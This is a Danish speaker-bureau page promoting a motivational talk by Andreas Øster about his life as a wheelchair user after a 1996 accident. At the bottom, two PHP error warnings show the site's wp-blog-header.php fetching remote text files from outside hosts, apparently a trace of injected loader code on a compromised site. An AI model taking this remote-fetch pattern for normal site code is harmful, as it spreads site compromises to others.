img-us
Mr. Chairman – MIN INDRE SUPERHELT

Et foredrag om hvordan livet kan ændre sig fuldstændigt på et splitsekund og vende alt hvad du troede du vidste om dig selv og livet, på hovedet.

Det er historien om en utrolig følsom, sårbar og hårdt prøvet dreng som troede han var fri af mange års prøvelser og nu skulle nyde hans frihed. Men som i stedet pludselig skulle finde styrke og motivation til at få det bedste ud af et helt nyt og meget hårdt ventende liv. Et liv som blev ved med at banke ham tilbage til start og som ville bringe ham masser af sorg og smerte, men som han bekæmpede med en fantastisk styrke og sin indre superhelt.  


Baggrund

Andreas Øster er i dag i 40’erne og har siddet i kørestol efter han som 18-årig d. 19/7-1996 kørte galt på sin knallert og brækkede sin ryg og fik et tryk på hans nerver, hvilket gjorde ham lam fra brystet og ned.  

Han boede og bor stadig i Fredensborg, hvor han også voksede op med en kærlig mor og en voldelig far hvilket havde stor indflydelse på udviklingen af hans personlighed før og efter hans ulykke.

I årene efter ulykken startede Andreas bla. flere forskellige virksomheder, indtil hans krop ikke længere kunne klare presset og han fik en førtidspension, som gjorde det muligt for ham at arbejde som freelancer når hans krop tillod det.

Desværre er Andreas’s krop ikke bygget til det store pres som det at sidde i en kørestol faktisk er og han har derfor været en hyppig gæst på hospitalet, hvor han har gennemgået mange og store operationer. Han har bla. fået rettet sin ryg op med mere end 45 grader og ligget på maven 24/7 i fire måneder pga. liggesår, som var blevet inficeret. Senest undgik han med nød og næppe at få amputeret sit ben på trods af at lægerne anbefalede det.

Andreas liv blev vendt 180 grader den Fredag i Juli 1996. Og dermed skulle han pludselig starte helt forfra og finde ud af hvem han selv var, hvem hans venner var og hvad han nu skulle bruge livet til.

Andreas tog det som om han var blevet tilbudt en ny chance og papiret var helt blankt.

Havde han dog bare vidst hvad der ventede ham.

Foredraget

Mr. Chairman – Min indre superhelt er en fantastisk og rørende fortælling, hvor Andreas fortæller helt åbent og ærligt om sit liv og bringer både publikum med om bag kulissen i et omtumlet liv, hvor bla. frygt og vold prægede hans barne og teenage år og helt frem til hans ulykke, hvor han tager fat i det at være handicappet, men egentlig bare gerne vil leve sit liv så normalt som muligt.

Man kan tydeligt mærke gnisten i Andreas når han fortæller om alt det som vi ”almindelige” mennesker ikke tænker over når vi feks. ser en kørestolsbruger/handicappet på gaden. Derfor giver Andreas også publikum mulighed for at stille spørgsmål, da det at være lam for mange er et ukendt område.

Et fantastisk foredrag som med Andreas’s egne ord, forhåbentlig giver folk indsigt, motivation og inspiration til at finde deres egen indre superhelt, når de skal takle deres livs små og store kriser.

Foredraget egner sig til en bred vifte af mennesker. For på trods af sit handicap, så har han oplevet/gennemgået utrolig mange ting.

”Bare tag mine hospitalsoplevelser, kærlighedsliv eller virksomhedseventyr, så er der nærmest til en hel bog”udtaler Andreas grinende.

Mr. Chairman – Min indre superhelt, er et foredrag alle får noget ud af.   

Egnede til:

  • Elever, studerende og undervisere på uddannelsesinstitutioner
  • Private virksomheder
  • Offentlige institutioner og arbejdspladser
  • Højskoler
  • Teambuildings sessioner
  • Private foreninger etc.
  • Kurser
Foredraget er ikke egnet til et publikum under 16 år.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Book nu

Andre foredragsholdere

Hatem Karim Abed Gharati

Joakim Seidler

Jonas Larsen

Carlos Sulsbruck Rasmussen


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22